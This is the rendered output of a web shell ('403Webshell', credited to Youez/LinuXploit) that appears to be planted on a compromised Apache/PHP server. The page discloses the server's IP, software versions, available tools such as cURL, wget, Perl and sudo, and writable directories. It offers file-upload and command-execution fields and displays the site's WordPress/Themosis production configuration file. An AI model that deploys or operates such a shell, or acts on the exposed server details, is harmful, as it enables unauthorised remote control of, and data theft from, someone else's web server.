403Webshell
Server IP : 157.230.181.24  /  Your IP : 216.73.217.11
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux conductive 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May 5 19:26:24 UTC 2026 x86_64
User :  ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/vhosts/untold/config/environments/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/untold/config/environments/production.php
<?php

	/*----------------------------------------------------*/
	// Production config
	/*----------------------------------------------------*/
	// Database
	define('DB_NAME', getenv('DB_NAME'));
	define('DB_USER', getenv('DB_USER'));
	define('DB_PASSWORD', getenv('DB_PASSWORD'));
	define('DB_HOST', getenv('DB_HOST') ? getenv('DB_HOST') : 'localhost');

	// WordPress URLs
	define('WP_HOME', getenv('WP_HOME'));
	define('WP_SITEURL', getenv('WP_SITEURL'));

	// Jetpack
	define('JETPACK_DEV_DEBUG', FALSE);

	// Encoding
	define('THEMOSIS_CHARSET', 'UTF-8');

	// Development
	define('SAVEQUERIES', FALSE);
	define('WP_DEBUG', FALSE);
	define('WP_DEBUG_DISPLAY', FALSE);
	define('SCRIPT_DEBUG', FALSE);

	// Themosis framework
	define('THEMOSIS_ERROR', FALSE);
	define('BS', FALSE);

Youez - 2016 - github.com/yon3zu
LinuXploit